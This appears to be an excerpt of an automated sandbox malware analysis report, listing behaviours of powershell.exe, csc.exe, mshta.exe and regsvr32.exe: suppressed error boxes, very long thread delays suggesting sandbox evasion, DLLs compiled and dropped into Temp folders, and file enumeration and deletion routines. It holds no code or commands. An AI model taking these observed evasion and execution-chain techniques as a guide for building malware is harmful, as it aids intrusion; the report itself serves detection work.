Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2390
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5598
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1463

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5044	Thread sleep time: -1667865539s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604	Thread sleep count: 1514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604	Thread sleep count: 1463 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04639F9E
